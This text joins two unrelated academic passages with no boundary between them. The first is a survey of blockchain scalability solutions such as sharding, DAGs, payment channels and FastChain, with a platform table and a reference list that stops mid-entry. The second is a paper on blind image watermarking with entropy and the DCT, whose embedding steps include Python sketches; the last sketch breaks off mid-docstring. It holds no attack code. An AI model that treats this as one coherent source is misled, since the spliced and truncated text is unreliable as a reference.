The block size of bitcoin is only 1 MB, and it can handle fewer than 7 tps (transactions per second). The Visa payment network can achieve 47,000 tps and currently handles hundreds of millions of transactions per day. Suppose the size of one transaction is 300 bytes; for bitcoin to reach Visa's level, it would require blocks of roughly 8 GB every 10 minutes, which would amount to over 400 TB of data per year. With such storage requirements, the bitcoin network would support only a few nodes, leading to a centralized network, which is the complete opposite of the decentralized network concept [2]. Bitcoin processes 3–7 tps with a 1 MB block size, and it takes 10 min to mine a single block. Ethereum handles 15–20 tps [9], but both look very poor when compared with the Visa payment network [12]. The performance of blockchain scalability can be measured by several key metrics, such as maximum transactions per second, minimum confirmation time, and cost per confirmed transaction (CPCT) [13]. These metrics fall into two categories with different requirements: overall performance metrics for users and detailed performance metrics for developers. The overall metrics for users include transactions per second, average response delay, transactions per CPU, transactions per memory second, transactions per disk I/O, and transactions per network. The detailed metrics for developers include peer discovery rate, response rate, transaction propagation rate, contract execution time, state updating time, and consensus cost time [14]. Of all these metrics, throughput and latency are the most important, as they directly influence users [15].
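The storage estimate above is a back-of-envelope calculation that can be checked directly; the 300-byte transaction size and the 47,000 tps figure are the assumptions taken from the text.

```python
TX_SIZE_BYTES = 300        # assumed average transaction size (from the text)
VISA_TPS = 47_000          # peak throughput cited for the Visa network
BLOCK_INTERVAL_S = 600     # bitcoin's 10-minute block interval

# Bytes per block if every Visa-level transaction landed in one bitcoin block.
block_bytes = TX_SIZE_BYTES * VISA_TPS * BLOCK_INTERVAL_S
# Blocks per year times bytes per block gives the annual ledger growth.
year_bytes = block_bytes * (365 * 24 * 3600 // BLOCK_INTERVAL_S)

print(f"block: {block_bytes / 1e9:.1f} GB")   # ≈ 8.5 GB per block
print(f"year:  {year_bytes / 1e12:.0f} TB")   # ≈ 445 TB per year
```

The result reproduces the order of magnitude cited in the text (roughly 8 GB per block and several hundred TB per year), which is what makes full nodes infeasible for ordinary participants at Visa scale.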
The ledger type is one parameter that affects blockchain scalability. Based on ledger type, blockchain architectures are divided into three groups: single ledger, multiledger, and interoperability. Ethereum is a single-ledger-based public network platform. Chain Core, Hyperledger Burrow, Hyperledger Sawtooth, Hydrachain, Hyperledger Iroha, Burst, NEM, BigchainDB, and MultiChain are single-ledger-based private network platforms. Quorum and Credits are single-ledger-based hybrid network platforms. Hyperledger Fabric and Oracle are multiledger-based private network platforms. Elements, Lisk, and Openchain are interoperability-based private network platforms [6]. Leader election and transaction serialization play an important role in the block generation process. Leader election uses three types of mechanism: fixed leaders, a single leader, and collective leaders. Hyperledger Fabric has a fixed set of leader nodes that run the PBFT consensus protocol. In Bitcoin-NG, a single leader is selected through PoW, and the selected leader verifies transactions until a new leader is selected. ByzCoin and Solida use committee election, or collective leader node mechanisms, to reduce confirmation time [11]. The network type, leader election mechanism, and ledger type all affect the transaction verification process. In a public network, a large number of nodes verify each transaction, while in private and consortium networks, only permissioned or a limited number of nodes do so; a limited or selected number of nodes completes the verification process faster than a large number of nodes.
Blockchain scalability solutions are categorized into three layers: Layer 0, Layer 1 (on-chain), and Layer 2 (off-chain). The solutions of each layer are divided into different categories [15].
4.1 Layer 0
Layer 0 offers data propagation solutions such as Erlay, Kadcast, Velocity, and bloXroute. This layer needs improvements in existing protocols as well as more solutions.
The block data category includes solutions such as SegWit, Bitcoin Cash, Compact Block Relay, Txilm, CUB, and Jidar [15]. The big-block approach can increase throughput and reduce some costs, but it also increases the probability of orphan blocks and ultimately raises the maintenance cost of the chain [16]. The digital signature takes up 65% of the transaction space; Segregated Witness (SegWit) stores the digital signature outside the block to increase tps, reducing the transaction size by keeping the signature separate from the block. Increasing the block size means more transactions per block, which helps improve blockchain scalability [9]. SegWit improves throughput and minimizes cost, but it increases code complexity and takes more time to process a transaction [16]. The consensus category has solutions such as Bitcoin-NG, Algorand, Snow White, and Ouroboros. Ouroboros can process 257.6 tps with a 2-min confirmation time, and Algorand can handle 875 tps with a 22-s confirmation time. These improve throughput but cannot solve the scalability challenge completely, and more solutions are needed [15]. The sharding category has solutions such as Elastico, OmniLedger, RapidChain, and Monoxide [15].
The sharding technique uses a parallel transaction verification mechanism in which many transactions are verified at the same time, improving system performance. Zilliqa is one solution that uses sharding to improve performance; it handles 1800 nodes at 1218 tps. It does not fully solve blockchain scaling, but it is an improvement over Ethereum, which handles 25,000 nodes at only 15–20 tps [9]. Sharding's parallel processing of transactions increases throughput, but the technique also faces challenges: if an attacker takes control of a single shard, data integrity is broken, the so-called 1% attack [16].
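The core idea of sharding, deterministic assignment of transactions to shards and parallel verification of each shard's batch, can be sketched as follows. This is an illustrative toy, not any particular protocol: the shard count, the hash-modulo assignment rule, and the stand-in verifier are all assumptions.

```python
import hashlib
from concurrent.futures import ThreadPoolExecutor

N_SHARDS = 4  # illustrative shard count

def shard_of(tx_id: str) -> int:
    # Deterministic assignment: hash the transaction id, take it
    # modulo the shard count, so every node agrees on the placement.
    return int(hashlib.sha256(tx_id.encode()).hexdigest(), 16) % N_SHARDS

def verify_shard(txs: list) -> int:
    # Stand-in for real signature/UTXO checks: just count the batch.
    return len(txs)

txs = [f"tx{i}" for i in range(1000)]
shards = {s: [] for s in range(N_SHARDS)}
for tx in txs:
    shards[shard_of(tx)].append(tx)

# Each shard verifies its own batch in parallel with the others.
with ThreadPoolExecutor(max_workers=N_SHARDS) as pool:
    verified = sum(pool.map(verify_shard, shards.values()))
print(verified)  # 1000 -- every transaction verified exactly once
```

Because assignment is deterministic, each transaction lands in exactly one shard, which is what makes the parallel verification both complete and free of double work.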
The directed acyclic graph (DAG) category has solutions such as Inclusive, Spectre, Phantom, Conflux, Dagcoin, IOTA, Byteball, and Nano. All of them try to overcome the scalability problem, but they are not enough to make blockchain completely scalable; the method has limitations, and further solutions are needed to overcome them [15]. Among the DAG-based solutions, Tangle, developed by IOTA, is a lightweight solution in which a node does not hold a full copy of the ledger. Bramas, Byteball, and Holochain are also DAG-based solutions [17]. DAG and blockchain both store transactions in an open ledger, but the way the ledger is maintained differs. The blockchain ledger consists of blocks containing headers and transactions, whereas a DAG stores only the account's transaction/balance history. In a blockchain-based platform, all network nodes verify transactions, while in a DAG-based platform a transaction is valid if a majority of votes are in its favor. Decreasing the block size is the main approach of the DAG technique. Many solutions use this method to scale blockchain, and a large number of investigations are ongoing, but none has proved successful yet [12]. DAG-based solutions have ledger security issues, and the decentralization of the technique is debatable, which may prevent its growth [17]. The payment channel category has solutions such as the Lightning Network, DarcMatter Coin (DMC), the Raiden Network, and Sprites [15]. The Lightning Network has almost no transaction fee or waiting time. It increases throughput and minimizes cost, but it is a solution only for payment channels with small transactions; it cannot process large payments or a variety of transaction types [16]. The side-chain category has solutions such as Pegged Sidechains, Plasma, and the Liquidity Network [15]. A Plasma chain uses a parent–child structure, which also improves throughput, but transaction verification is very expensive in that structure [16]. The cross-chain category has solutions such as Cosmos and Polkadot [15]. The off-chain computation category has solutions such as Truebit and Arbitrum. All these protocols try to solve the scalability challenge, but each faces problems of its own, and further solutions are needed to address their limitations [15].
Table 1 Blockchain platforms using different network types, architectures, and consensus mechanisms

Platform       | Network type       | Architecture          | Consensus mechanism(s) | tps
Bitcoin        | Public             | Single chain          | PoW                    | 7
Ethereum       | Public             | Single chain          | PoW, PoS               | 15–20
Hyperledger    | Private/Consortium | Single chain          | PoET, PBFT             | 3500
R3 Corda       | Private/Consortium | Single chain          | PBFT                   | 15–1678
Achain         | Public             | Parallel chain        | PoW, PBFT, PoS         | 1000
Nxt Blockchain | Public/Consortium  | Single chain          | PoS                    | 100
Ardor          | Public/Consortium  | Parent–child chain    | PoS                    | –
Chain Core     | Private/Consortium | Single chain          | PoA                    | –
EOS            | Private            | –                     | PoS, PBFT              | 3996
IOTA Tangle    | Public             | DAG                   | PoW                    | 100–140
Multichain     | Private            | Main chain, off-chain | PoW                    | 2000–2500
Quorum         | Private            | –                     | PoS, PBFT              | –
Slimcoin       | Public/Private     | –                     | PoB                    | –
Tendermint     | Private/Consortium | Single chain          | PoC                    | 10,000
Block propagation time is closely related to network bandwidth: a node with higher bandwidth receives a block sooner than one with less. A node with 500 Mbps bandwidth takes 1.55 s on average to receive a block, while a node with 256 kbps bandwidth takes 71.71 s. The block propagation time is the time a miner needs to receive a new block, and a better neighbor selection algorithm can reduce it to optimize the blockchain system. In FastChain [23] (a protocol to scale blockchain), a lower-bandwidth node sends the block to a higher-bandwidth node, and the higher-bandwidth node then sends it to the rest of the nodes. Miners with limited bandwidth favor nodes with higher bandwidth and disconnect themselves. The FastChain implementation is divided into a bandwidth monitoring phase and a neighbor update phase: in the bandwidth monitoring phase, each node maintains an up-to-date bandwidth table, and in the neighbor update phase, each miner periodically refreshes its neighbor connections. The NS3 simulator was used for experimentation, and the results show an increase in effective block rate (the number of blocks added to the chain) of up to 40% and in throughput of 20–40% compared with bitcoin. This solution has some limitations: each network node has to maintain an up-to-date bandwidth table and periodically refresh its neighbor connections, and miners with limited bandwidth always depend on higher-bandwidth nodes.
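The neighbor update phase can be illustrated with a minimal sketch: given a bandwidth table, a miner keeps only the k highest-bandwidth peers as neighbors. The function name, peer names, and bandwidth values here are hypothetical; the real FastChain protocol also runs the bandwidth monitoring phase that keeps the table current.

```python
def update_neighbors(bandwidth_table: dict, k: int) -> list:
    """Periodic neighbor update in the spirit of informed neighbor
    selection: keep the k peers with the highest measured bandwidth."""
    return sorted(bandwidth_table, key=bandwidth_table.get, reverse=True)[:k]

# Measured peer bandwidths in Mbps (illustrative values).
table = {"peerA": 500.0, "peerB": 0.256, "peerC": 100.0, "peerD": 50.0}
print(update_neighbors(table, k=2))  # ['peerA', 'peerC']
```

This captures the trade-off noted in the text: propagation speeds up because blocks travel through high-bandwidth nodes first, but low-bandwidth miners end up depending on those nodes.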
In PoW, if two miners solve the hash at the same time, the blockchain adds the block accepted by the majority of nodes (at least 51%), and the resources the other miner put into mining its block are wasted. To overcome this problem, solo mining is replaced by parallel mining [24]. Parallel mining requires a manager to ensure that no two miners use the same nonce value: the manager distributes the transaction hash and groups of nonces to each active miner, and a miner who solves a block becomes the next manager. The GX library of Golang was used for experimentation, and the results show an improvement in the scalability of PoW of up to 34% over the current situation. Among the limitations, a miner with more processing power can try more nonce values and thus has a higher probability of becoming manager, and all miners depend on the manager to obtain the transaction hash and nonces. If the manager goes offline or fails to respond, a single point of failure arises in this solution.
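The manager's central task, splitting the nonce space into disjoint ranges so that no two miners ever try the same nonce, can be sketched as follows. This is an illustrative Python sketch (the cited work used Golang), and the function and miner names are hypothetical.

```python
def partition_nonces(nonce_space: int, miners: list) -> dict:
    """Manager's job in parallel mining: split [0, nonce_space) into
    disjoint, contiguous ranges, one per active miner, so no nonce
    is ever tried twice across the group."""
    step = nonce_space // len(miners)
    return {
        m: range(i * step,
                 nonce_space if i == len(miners) - 1 else (i + 1) * step)
        for i, m in enumerate(miners)
    }

ranges = partition_nonces(2**32, ["m1", "m2", "m3", "m4"])
# Full coverage of the 32-bit nonce space, with no overlap between miners.
assert sum(len(r) for r in ranges.values()) == 2**32
```

The sketch also makes the stated limitation visible: every miner must ask the manager for its range, so a silent manager stalls the whole group.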
The sharding technique has three components: (1) assignment of nodes to shards; (2) an intra-shard consensus protocol; and (3) cross-shard transactions (to remove the double-spending problem). OmniLedger [25] modified the Elastico sharding protocol and tried to reduce its limitations. OmniLedger adopts the unspent transaction output (UTXO) model, the same as bitcoin. By combining ByzCoin and PBFT, it introduced the ByzCoinX consensus for shards, and it combines RandHound with Algorand to periodically rotate the set of validators, whose role is to assign and verify the tasks of shards. OmniLedger also introduced the Atomix protocol, which uses a two-phase client-driven lock/unlock scheme to commit or reject a proof, and it uses an anti-Sybil attack method to automatically handle cross-shard transactions. Its dataset contains the first 10,000 blocks of the bitcoin blockchain.
The inspector node investigates malicious activities going on in a shard and eliminates them. All nodes are reshuffled by a random sampling method if any suspicious activity is found by an inspector node, and the funds involved in a malicious transaction are transferred to the inspector node. This theory-based solution provides better security for sharding-based blockchain applications.
The cross-shard transaction is the biggest challenge faced by the sharding method, as it increases confirmation time: all shards involved in a cross-shard transaction must execute multi-phase protocols to confirm its authenticity. OptChain [30] offers a solution to improve cross-shard transaction processing. It optimizes the placement of transactions into shards, improving on the random placement strategy, and modifies the simple payment verification protocol; PageRank analysis is used to place transactions into shards. The dataset contains the first 10 million (10,000,000) bitcoin transactions, and the OverSim framework, simulating a system on OMNeT++ 4.6, was used for experimentation. The protocol can process 6000 tps with 16 shards and a 10.5-s confirmation time; compared with OmniLedger, it reduces latency by 93% and increases throughput by 50%. OptChain was compared only with the OmniLedger sharding protocol, and its authors predict similar results against other sharding protocols. It is implemented in existing wallet software, so it is useful only for the payment module. The protocol improves the cross-shard transaction process; the remaining core components of a sharding protocol, (1) assignment of nodes to shards and (2) the intra-shard consensus protocol, are not included.
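The multi-phase cross-shard confirmation that both OmniLedger (via Atomix) and OptChain must perform can be sketched as a client-driven two-phase lock/unlock over UTXOs. This is a toy model, not either protocol's actual implementation: the classes, method names, and single-process setting are all assumptions made for illustration.

```python
class Shard:
    """Toy shard holding a set of unspent outputs (UTXOs)."""
    def __init__(self, utxos):
        self.utxos, self.locked = set(utxos), set()

    def lock(self, utxo) -> bool:
        # Phase 1: reserve the input if it is unspent and unlocked.
        if utxo in self.utxos and utxo not in self.locked:
            self.locked.add(utxo)
            return True
        return False

    def unlock(self, utxo, spend: bool):
        # Phase 2: commit (spend the UTXO) or abort (release the lock).
        self.locked.discard(utxo)
        if spend:
            self.utxos.discard(utxo)

def cross_shard_spend(inputs):
    """Client-driven two-phase commit over [(shard, utxo), ...] inputs."""
    acks = [(s, u, s.lock(u)) for s, u in inputs]   # phase 1 on every shard
    ok = all(a for _, _, a in acks)                 # commit only if all locked
    for s, u, a in acks:                            # phase 2: commit or roll back
        if a:
            s.unlock(u, spend=ok)
    return ok

s1, s2 = Shard({"utxo1"}), Shard({"utxo2"})
print(cross_shard_spend([(s1, "utxo1"), (s2, "utxo2")]))  # True: both inputs spent
print(cross_shard_spend([(s1, "utxo1"), (s2, "utxo2")]))  # False: already spent, rolled back
```

The extra round trips of the lock phase are precisely the overhead the text identifies: each cross-shard transaction must wait for every involved shard before it can commit.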
Ethereum introduced the concepts of smart contracts and decentralized applications (DApps). On-chain execution of a smart contract increases confirmation time, which degrades system performance. One solution executes the smart contract in on-chain and off-chain phases to check system performance. It uses a hybrid on-/off-chain computation model with a plug-and-play approach that is compatible with existing smart contract systems. The Solidity language is used to write the smart contracts, and the Kovan test network, Ethereum's official test network, is used for experimentation. This solution assumes that all network nodes are honest [31].
The Hyperledger Fabric platform supports private and consortium blockchain networks. Hyperledger Fabric v1.4 (the latest version at the time of the study) [32] allows developers to select a consensus interface, either Solo or Kafka, to provide an ordering service, and supports either LevelDB or CouchDB as the state database. Smart contracts can be written in languages such as Golang, JavaScript, and Java. The study used the Solo (single-orderer) ordering service and CouchDB in its deployment model, with smart contracts written in JavaScript; the entire deployment was installed and run on the Linux Ubuntu operating system. For the dataset, 1000 and 5000 transactions were generated for the first and second rounds, respectively, and the blockchain benchmark tool Hyperledger Caliper was used to evaluate the results. The case study shows that Hyperledger Fabric handles up to 100,000 nodes (participants) on the selected AWS EC2 instance (AWS, Amazon Web Services, rents out virtual machines on which users can deploy their applications). Hyperledger Fabric v1.4 can process up to 200 tps with a 0.01–0.16 s confirmation time. By comparison, the sharding protocol SSChain can handle more than 6500 tps with 1800 network nodes [33].
Proper partitioning is the first step in the sharding technique; if the partitioning is not designed systematically, system performance degrades instead of improving. The Ethereum blockchain was taken as a graph to evaluate partitioning, using five methods: Hashing, the Kernighan–Lin algorithm, METIS, R-METIS, and TR-METIS. The metrics used for performance measurement were the balance of shards, the number of transactions spanning multiple shards, and the amount of data that would be relocated across shards upon repartitioning of the graph. The results show that the Hashing and Kernighan–Lin algorithms produce better partitions. If the sharding method were implemented in Ethereum, it would change the design of the blockchain [36]. Table 2 summarizes all the latest solutions with their datasets, experimental devices, network sizes, and evaluation results.
The Internet of things (IoT) has received much attention from academia, society, and industry, as IoT improves many business processes, human activities, and services. It still has challenges that need to be solved, such as trust, security, and overhead, and it is expected that the IoT ecosystem will become smarter and more efficient using blockchain technology. However, IoT produces a large amount of data while blockchain can process only a limited number of transactions, so at present it is difficult for blockchain to process the data produced by IoT [37]. Blockchain has enough capacity to store important data in a distributed and secure manner, and it guarantees that data is original, which yields accurate data analysis when combined with big data analytics [38]. Industrial development depends on reliable partnerships, but its growth is hindered by increasing cybercrime and fraud; blockchain can help reduce these kinds of challenges. Industrial development would improve further by merging blockchain technology with IoT and cloud technology [5].
the real world. A smart contract is lines of code stored on the blockchain that execute automatically (self-verifying, self-executing, and tamper-resistant) when their conditions are satisfied. It is an event-driven program that runs on a blockchain platform and needs no monitoring; a consensus protocol is used to run the sequence of events included in the smart contract. Different kinds of consensus protocols have been introduced according to the requirements of applications, and more may appear in the future. The benefits of smart contracts are real-time operation, accuracy, lower cost, and time saving. Any application can be built without a third party by combining blockchain and smart contracts, and it will be reliable and secure. Some use cases are supply chains, the Internet of things, healthcare systems, digital rights management, insurance, financial sectors, and real estate [39]. The smart contract is in its early stage, and before implementation it is necessary to solve challenges such as scalability, flexibility, and security.
Cryptocurrency is not limited to bitcoin and Ethereum's Ether; at present, hundreds of cryptocurrencies have been introduced. It is therefore necessary to design a blockchain testing mechanism to assess the quality of different blockchains. The testing mechanism could include a standardization phase and a testing phase. The standardization phase would check the quality of blockchains and verify that a new blockchain actually works as its developers describe; in the testing phase, different criteria would be used to test the performance of the blockchain [38]. An implementation of blockchain has to guarantee security, privacy, high throughput, and data integrity. However, these qualities raise many challenges, such as scalability, interoperability, cost-effectiveness, authentication, privacy, and security, that need to be addressed [40].
Blockchain technology has many good features, such as trust, transparency, automation, anonymity, security, auditability, and decentralization [11, 38]. Despite these qualities, its development is growing slowly because of the scalability problem. Researchers have conducted many studies and proposed many solutions for blockchain scalability; nevertheless, some solutions address only the scalability problem and do not cover the decentralization and security aspects of blockchain [11]. The open-source platforms Ethereum and Hyperledger help build decentralized applications with public and private network types, respectively. Blockchain provides security through its peer-to-peer network, distributed ledger, and asymmetric encryption. By implementing this technology, many sectors, such as finance, healthcare services, and mobile networking, can be converted from existing centralized systems into secure decentralized ones. Industries and business sectors are interested in blockchain technology as a way to improve their existing systems [41, 42]. Despite the business sector's great curiosity to implement this technology in its business processes, there are insufficient answers about its effectiveness.
A SWOT analysis shows the strengths, weaknesses, opportunities, and threats of blockchain technology. Its strengths are that it is fully transparent, works without a middleman, and is traceable, tamper-free, highly efficient, lower risk, lower cost, decentralized, distributed, immutable, secure, reliable, accurate, trusted, and auditable. Its weaknesses are scalability, storage issues, cybersecurity, immaturity, lack of standards, and lack of governance. Its opportunities include automation, improvement of supply chains, business process optimization, improved customer satisfaction through transparency, innovation in every industry, and opportunities in IoT. The need for much more research study is counted among its threats [43]. The research community needs to carry out detailed study and analysis of scalability and security for rapid development at the technological level [41].
6 Conclusion
After reviewing all the problems and solutions, we conclude that one needs to simulate the existing technology and check its performance. The scalability challenge should be researched by changing the consensus and by making smart contract or protocol-level changes to the technology that push back the limits of the blockchain. Achieving this would enable robust applications in many domains.
References
5. Ahram, T., Sargolzaei, A., Sargolzaei, S., Daniels, J., & Amaba, B. (2017). Blockchain
technology innovations. In 2017 IEEE technology & engineering management conference
(TEMSCON) (pp. 137–141). IEEE.
6. Ismail, L., & Materwala, H. (2019). A review of blockchain architecture and consensus
protocols: Use cases, challenges, and solutions. Symmetry, 11(10), 1198.
7. Lopes, J., & Pereira, J. L. (2019). Blockchain projects ecosystem: A review of current technical
and legal challenges. In World Conference on Information Systems and Technologies (pp. 83–
92). Cham: Springer.
8. Puthal, D., Malik, N., Mohanty, S. P., Kougianos, E., & Das, G. (2018). Everything you
Secured Blind Image Watermarking
Using Entropy Technique in DCT
Domain
Abstract Today, sound, video and pictures can be communicated with the utmost ease. However, security and copyright of digital media have become significant issues, so an emerging method known as digital watermarking is used to shield digital media from counterfeiting and unapproved use. In this paper, a blind image watermarking technique is presented, which uses the entropy method and watermark encryption with a predefined mathematical function to make the process more robust, secure and imperceptible. The watermark is inserted in the DCT domain, which provides robustness against bandpass filtering. To provide objective evidence of the performance, peak signal to noise ratio (PSNR) and normalized correlation (NC) are used as performance measures. The method achieves PSNR values greater than 40 dB, and NC values in the range of 0.9–1. The proposed technique has been implemented in MATLAB 2020a; on testing under various attacks, it achieved a good balance between imperceptibility and robustness.
1 Introduction
Digital watermarking helps to protect digital media from counterfeiting and inappropriate use of data [1–3]. This technique has proved successful in reducing the unfair distribution of data and violation of the copyright act [4, 5]. In this technique, a watermarked image is obtained by embedding secret information, called a watermark, into the cover image [6, 7].
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_3
M. Gupta and R. Rama Kishore
Earlier algorithms embedded and extracted watermarks through spatial approaches, such as the LSB (least significant bit) watermarking technique [8–10], in which the LSBs of the cover image carry the watermark. Algorithms based on this method are not robust enough and can be disclosed through mathematical analysis. Other, more refined algorithms embed watermark bits in the frequency domain of the image; for instance, [11–13] placed the watermark in the frequency spectrum to achieve high security and reliability [14–16]. The algorithm given by Shih [17] increased the capacity of the watermark's frequency domain while maintaining imperceptibility. Savakar [18] tried to maintain the cover image statistics by using an embedding technique.
In the proposed watermarking technique, Shannon's entropy is used to find the locations that are more robust for inserting the watermark bits, as defined by Garg and Kishore [19]. As the introduced algorithm is blind, neither the actual watermark nor the host image is required at the time of extraction. The discrete cosine transform is used as the embedding domain.
The rest of the paper is organized as follows. Section 2 gives a concise summary of the work published in the domain of digital watermarking. Section 3 describes the proposed digital image watermarking method. Section 4 presents the experimental results of the proposed work and analyses them to discover similarities and differences with existing works. Section 5 concludes the proposed work.
2 Related Work
In the proposed work, the DCT technique with entropy is used, so this section assesses the work done in the field of digital watermarking using entropy methodology. Loan et al. [20] gave a digital image watermarking technique dependent on entropy to enhance imperceptibility and robustness. One low-frequency watermark and another high-frequency watermark are embedded in this technique [21, 22]. The region with a high entropy value is detected in the host image for embedding the watermark, and DWT and SVD are applied for inserting the watermark [23–26]. Yang et al. [27] presented an information-masking model using the idea of entropy to advance robustness and imperceptibility in the temporal domain and spatial spectrum. Mehta et al. [28] introduced an image watermarking method using block entropy, where the blocks of high entropy are used for inserting the watermark through the LSB substitution method.
Deljavan et al. [29] proposed a blind, HVS-based, transparent, scalable watermarking algorithm based on DWT, robust against scalable image coding. The selected coefficients in the high-frequency sub-bands are chosen for embedding the watermark upon analysing luminance, texture and contrast. Furthermore, the selection of the coefficients takes place through entropy and amplitude analysis. Applying multiple levels of DWT to the watermark yields a scalable representation of it [30–32], and selected coefficients of the host image's DWT sub-bands are used for inserting the decomposed watermark sub-bands [33, 34].
Garg and Kishore [35] applied the entropy method to optimize the results; the watermark bits are embedded in the blocks of low entropy instead of being spread over the complete image. Experimental results show that their technique satisfies both imperceptibility and robustness requirements. Mohammed et al. [36] used an HVS-based entropy parameter for each block in the DWT and SVD domain. The method asserts that embedding the watermark in these particular blocks provides more imperceptible and robust results [37, 38]. Mehta et al. [39] adopted fuzzy entropy to embed the watermark bits. Fuzzy entropy is used to discard superfluous and inappropriate blocks [40], which reduces the dimensionality of the watermark embedding technique and provides better robustness [41, 42].
Based on the papers mentioned above, which concern watermarking greyscale images, a block entropy-based digital watermarking technique is used. The introduced technique inserts the watermark in selected segments of the greyscale image instead of embedding it in the complete host image. Segments are selected based on their entropy values. The watermark is inserted in the chosen segments using two DCT coefficients; the variation between these coefficients needs to be moderate, and they should lie in the low-frequency region. The robustness increases with the distance [43]. The watermark image is encrypted by a bit-XOR encryption technique, which increases security because an attacker would not be able to extract the original watermark from the watermarked image [44]. The encrypted watermark is placed in selected DCT coefficients such that the watermark strength is adaptive for each block, which improves the imperceptibility of the watermark.
The proposed digital image watermarking algorithm utilizes the concepts of watermark encryption, entropy and DCT for inserting the watermark in the host picture. DCT is used to transform the image from the spatial domain to the frequency domain by expressing the image as a series of cosine waves at different frequencies. To optimize the results, the entropy of every block is calculated, and the blocks are then sorted by their entropy values. The blocks with lower entropy are used for embedding the watermark [45]. The method is adaptive, as the embedding strength for each block changes with the characteristics of that block. To attain more security, watermark encryption is done using the predefined mathematical function. In this section, the proposed digital image watermarking technique is defined. The algorithm for embedding the watermark is covered in Sect. 3.1, the algorithm for extracting the watermark is covered in Sect. 3.2, and their block diagrams are shown in Figs. 1 and 2, respectively.
Step 1. Read the host image IMG and watermark image WM.
Step 2. Encrypt watermark with the predefined mathematical function.
The objective is to secure the watermark from attackers. It is arduous for attackers to
obtain the original watermark. The process of encryption is done using the predefined
mathematical function.
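Step 2 can be sketched as follows. Since the paper does not disclose its predefined mathematical function, a seeded pseudo-random key stream stands in for it here (an assumption); XOR is its own inverse, so the same routine decrypts.

```python
import numpy as np

def xor_encrypt(watermark_bits, seed=42):
    """Bit-XOR the binary watermark with a pseudo-random key stream.

    The paper's predefined mathematical function is not disclosed, so a
    seeded PRNG stands in for it here. XOR is its own inverse, hence the
    same call decrypts an encrypted watermark.
    """
    rng = np.random.default_rng(seed)
    key = rng.integers(0, 2, size=watermark_bits.shape, dtype=np.uint8)
    return np.bitwise_xor(watermark_bits.astype(np.uint8), key)

wm = np.array([[1, 0, 1],
               [0, 1, 1]], dtype=np.uint8)
enc = xor_encrypt(wm)         # what gets embedded
dec = xor_encrypt(enc)        # the same key stream restores the original
assert np.array_equal(dec, wm)
```

Because XOR with the same key is an involution, extraction simply reruns the routine on the recovered bits.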
Step 3. Divide the Image IMG into non-overlapped 8 × 8 blocks.
Step 4. Calculate the Entropy of each block.
Entropy is the average uncertainty value in an image. The Shannon entropy of a random variable X is given by the following formula, where p(x) is the probability mass function, whose value lies between 0 and 1. The value of −log p(x) represents the information carried by the single symbol x. If the probability of a pixel value is zero, it does not contribute to the entropy calculation, as 0 log 0 = 0. The higher the entropy, the more information the image stores.
H(X) = − Σ_{x∈X} p(x) log p(x)    (1)
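Step 4 and Eq. 1 can be sketched as below; p(x) is estimated from the block's grey-level histogram, an assumption since the paper does not state how the probabilities are obtained.

```python
import numpy as np

def block_entropy(block):
    """Shannon entropy (Eq. 1) of a greyscale block.

    p(x) is estimated from the block's grey-level histogram; levels with
    zero probability are skipped, consistent with 0 log 0 = 0.
    """
    _, counts = np.unique(block, return_counts=True)
    p = counts / counts.sum()
    return float(-np.sum(p * np.log2(p)))

flat = np.full((8, 8), 128)            # one grey level: no uncertainty
assert block_entropy(flat) == 0.0
half = np.array([[0, 255] * 4] * 8)    # two equally likely levels
assert abs(block_entropy(half) - 1.0) < 1e-12
```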
Step 5. Sort the blocks in ascending order of entropy and select the blocks with low entropy values.
Step 6. The DCT is calculated for each selected block, and the watermark is embedded in two selected coefficients "bi" and "bj".
Step 7. Compute watermark strength.
For embedding the watermark, its strength is adjusted on the basis of the mean of the
blocks. This keeps the strength of the watermark related to the local characteristics
of the block. Furthermore, it also helps to embed the watermark with a lesser impact
on the imperceptibility of the image.
The watermark strength Alpha is computed as the mean of the selected blocks.
Alpha = (1/n) Σ_{i=1}^{n} dct(i, j)    (2)
where “n” is block size, i and j are the positions of DCT coefficients in a block of
size 8 × 8.
Step 8. Embed watermark bits.
If watermark bit is one, then modify the selected coefficients in accordance with Eq. 3.
And if watermark bit is zero, then modify the selected coefficients in accordance with
Eq. 4.
bi = bi + Alpha ∗ μ
bj = bj − Alpha ∗ μ (3)
bi = bi − Alpha ∗ μ
bj = bj + Alpha ∗ μ (4)
Here “bi” and “bj” are the chosen DCT coefficients, μ is strength multiplier. When
wi = 1, watermark strength is added to the coefficient “bi” and subtracted from “bj”.
Furthermore, when wi = 0, watermark strength is subtracted from the coefficient
“bi” and added to “bj”. This makes “bi” greater if watermark bit is one and “bj”
greater if watermark bit is zero.
Step 9. Generate the Watermarked Image.
Combine all 8 × 8 blocks after modifications in the bits and apply inverse DCT to
generate the watermarked image.
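Steps 6–8 above can be sketched as follows, operating directly on a block of DCT coefficients. Treating Alpha (Eq. 2) as the mean of all coefficients in the block, and the value 0.5 for the strength multiplier μ, are illustrative assumptions; the paper fixes the coefficient positions with its predefined function.

```python
import numpy as np

def embed_bit(dct_block, bit, i, j, mu=0.5):
    """Embed one watermark bit into coefficients bi, bj (Eqs. 3 and 4).

    Alpha (Eq. 2) is taken as the mean of the block's DCT coefficients,
    so the embedding strength adapts to the local block. mu is the
    strength multiplier; 0.5 is an assumed value, not from the paper.
    """
    alpha = float(np.mean(dct_block))
    out = dct_block.astype(float).copy()
    if bit == 1:        # Eq. 3: bi grows, bj shrinks
        out[i] += alpha * mu
        out[j] -= alpha * mu
    else:               # Eq. 4: bi shrinks, bj grows
        out[i] -= alpha * mu
        out[j] += alpha * mu
    return out

block = np.full((8, 8), 10.0)        # stand-in block of DCT coefficients
marked = embed_bit(block, 1, (3, 1), (1, 3))
assert marked[3, 1] > marked[1, 3]   # bit 1 leaves bi greater than bj
```

Because the bit is encoded purely in the ordering of bi and bj, the later extraction needs no reference image.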
Step 3: Calculate entropy of each block by applying the formula used for
embedding watermark, as presented in Eq. 1.
Step 4: Sort the blocks based on the entropy value in ascending order, to select
the blocks with low entropy value.
Step 5: Apply the DCT transformation on each block.
Step 6: Choose two coefficients “bi” and “bj” in each block using the predefined
mathematical function.
Step 7: If “bi” is greater than “bj”, bit one is extracted, and if “bj” is greater than
“bi ”, bit zero is extracted.
Step 8: The predefined mathematical function is employed to reconstruct the
watermark from the encrypted watermark.
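The comparison rule of Step 7 is simple enough to sketch directly; `dct_block` is assumed to hold a block's DCT coefficients.

```python
import numpy as np

def extract_bit(dct_block, i, j):
    """Step 7 of extraction: the bit is read from the ordering of the
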